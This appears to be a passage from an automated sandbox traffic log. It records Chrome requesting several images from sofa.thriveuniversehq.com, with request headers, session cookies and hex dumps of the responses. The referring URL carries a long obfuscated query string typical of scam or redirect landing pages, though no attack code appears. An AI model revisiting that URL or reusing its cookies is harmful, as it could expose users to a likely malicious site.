https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:51 UTC708INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 33 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 37 38 64 2d 36 30 38 39 30 32 66 63 34 64 62 33 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 35 37 30
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:51 GMTContent-Type: image/jpegContent-Length: 1933Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "78d-608902fc4db3d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4570
                                                          2023-11-27 03:23:51 UTC661INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 00 32 00 32 03 01 11 00 02 11 01 03 11 01 ff c4 00 99 00 00 03 01 00 03 00 00 00 00 00 00 00 00 00 00 00 05 06 07 04 00 03 08 01 00 03 01 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*Ducky<Adobed22
                                                          2023-11-27 03:23:51 UTC1272INData Raw: ef 95 8b 10 08 3e aa 1f ed c6 a6 f8 9f 25 c8 47 b8 79 a2 3b be dd 37 df 17 71 0d 2a 67 ba 64 ee e4 40 c9 81 1f 47 3c 02 19 3d 83 c0 23 4f 19 de 7c d6 bd ba ce b7 c2 78 d9 25 78 23 75 bc 75 8b 5b c5 95 16 46 25 80 35 07 26 19 8f 41 c6 64 97 db fa 5c 63 2e b2 1b 38 ef a4 9e 00 55 1a dc 03 5d 46 87 b8 49 2d 5e 4a 53 d9 e9 c1 03 f6 df 55 82 dd d5 08 37 de 5b 97 d7 4b e1 e8 e2 39 7e 4e 18 ed b7 40 83 bd da a6 0e 91 da 5b a9 77 b6 9a fd 99 ad c1 0a d4 34 05 bb 07 b0 61 2e 54 bd a6 86 b7 29 ee 24 7d d7 17 3b 01 3b f5 8f e5 d6 df 6b b7 5b 49 b2 9f 76 f0 ab fb e5 03 50 7c b8 95 e0 4e 15 8f 92 41 f7 5d 37 2f 19 a4 7b 6d 45 31 db 76 96 9e fe 4b 59 e4 f7 2a ca 1d a5 0a cd 40 0e 4e 34 03 4f 6e 29 3e 60 1b 51 75 32 38 09 71 06 c9 ce 4e 86 df 6c e1 db b7 3b a7 9a ee 3b
                                                          Data Ascii: >%Gy;7q*gd@G<=#O|x%x#uu[F%5&Ad\c.8U]FI-^JSU7[K9~N@[w4a.T)$};;k[IvP|NA]7/{mE1vKY*@N4On)>`Qu28qNl;;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.549746172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC443OUTGET /people/5.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:51 UTC698INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 35 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 65 32 2d 36 30 38 39 30 32 66 63 34 65 61 64 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 39 30
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:51 GMTContent-Type: image/jpegContent-Length: 1250Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "4e2-608902fc4eadd"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4490
                                                          2023-11-27 03:23:51 UTC671INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8b 00 00 03 01 01 00 03 00 00 00 00 00 00 00 00 00 00 00 05 06 04 03 01 02 07 01 01 01 01 01 01 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:51 UTC579INData Raw: a9 6d c7 0d 7c 6f 16 39 83 40 48 02 45 bf 57 91 85 e9 be 0f cc ac 62 5c 5c cc 71 92 d1 70 49 95 8a 92 3f 30 15 30 f1 d0 f4 d1 d7 32 b9 30 ef e2 08 f0 a2 58 a3 09 24 93 11 cc a2 dc ea a3 d2 3f 75 3b d8 cc 6f b6 19 73 08 8d 22 e4 76 63 70 58 a5 f9 6d df 52 5b d6 eb 36 e7 b9 1c 82 39 23 8b d0 85 06 8a 07 e3 4c d3 70 69 36 b5 8e 55 ba a0 24 a6 bc 10 8d 34 b7 13 55 1c 19 d9 a6 de 87 b9 bb ce df 98 ed 93 15 d8 1e 17 95 14 00 dd 96 36 26 dc 2b 94 3b 9e 32 cd e9 c6 a1 17 87 2d c2 b1 36 d4 5b b2 a5 5d b3 32 9c c3 0a 59 17 d2 29 6e 5b 03 a5 71 53 9c aa 5d 55 84 48 de 94 a0 12 bf 6d 30 44 22 c7 e3 31 bf e7 6e ff 00 fa fd 8a 29 07 c7 fe 6f 52 fa 0d 7f 0a 28 ed 47 76 a3 24 99 f8 e6 25 c5 2a c1 fb 58 81 ca cc 4d eb 98 33 c8 e4 c6 39 4d ac 79 7e ca e9 b6 60 c7 b9 ee 51
                                                          Data Ascii: m|o9@HEWb\\qpI?0020X$?u;os"vcpXmR[69#Lpi6U$4U6&+;2-6[]2Y)n[qS]UHm0D"1n)oR(Gv$%*XM39My~`Q


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.549747172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC443OUTGET /people/3.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:51 UTC701INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 33 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 33 61 38 2d 36 30 38 39 30 32 66 63 34 64 62 33 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 39 30 0d
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:51 GMTContent-Type: image/jpegContent-Length: 936Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "3a8-608902fc4db3d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4490
                                                          2023-11-27 03:23:51 UTC668INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 83 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 01 01 00 03 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:51 UTC268INData Raw: 44 73 10 9e ff 00 98 ef ec 1d 88 5d 38 6f 0a 65 8f d8 09 db b9 a4 50 84 df 2b e5 2d 79 32 64 7c 4d 6d b6 0b 02 e3 c2 ab 4c a9 21 fa 83 87 8e c0 d8 63 04 4b 41 de 75 2e 3a 9a 8b 0f 1c f6 d8 5c fc b0 5a ef f8 23 3c ae 91 80 40 5a c2 3b cd b5 28 95 9d d1 31 95 75 1d 21 1a 85 4c d8 4c 32 d2 17 1d ae 15 a1 ba c6 38 1e f3 57 9b 05 75 10 8a b7 69 68 63 95 46 f7 ce 43 5b 57 bc 1d be 80 2f 52 ba 25 ae 8d ae 63 c1 6b b8 82 b6 e4 58 fb 5b 26 49 14 07 e0 8c f4 81 af ad 4f 33 e6 11 8a e3 c4 dd ce fe 47 80 0d 3f 08 4a f8 d6 19 37 0c 2c 9e 78 a5 22 9e e4 25 7e a1 fd 07 b1 08 e5 09 8b 3d 47 2f ff 00 3c 7a 77 9d a7 b7 d2 b8 f8 fe 74 fd 67 5d 75 28 42 9c be aa 76 27 0f b6 fd c4 26 f3 7d ea 1d dc 3e c4 21 51 6c 23 dc f4 90 ff 00 8a 1d 3c a1 e5 f7 74 f9 57 11 ba 70 42 13 fd
                                                          Data Ascii: Ds]8oeP+-y2d|MmL!cKAu.:\Z#<@Z;(1u!LL28WuihcFC[W/R%ckX[&IO3G?J7,x"%~=G/<zwtg]u(Bv'&}>!Ql#<tWpB


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.549748104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:52 UTC3751OUTGET /utils/banners/images/2023-months/2023-11.png?v=1 HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:52 UTC701INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 36 30 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 35 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 38 63 62 65 2d 36 30 38 39 30 33 31 38 61 38 37 37 36 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 32 34
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:52 GMTContent-Type: image/pngContent-Length: 36030Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:59 GMTETag: "8cbe-60890318a8776"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 424
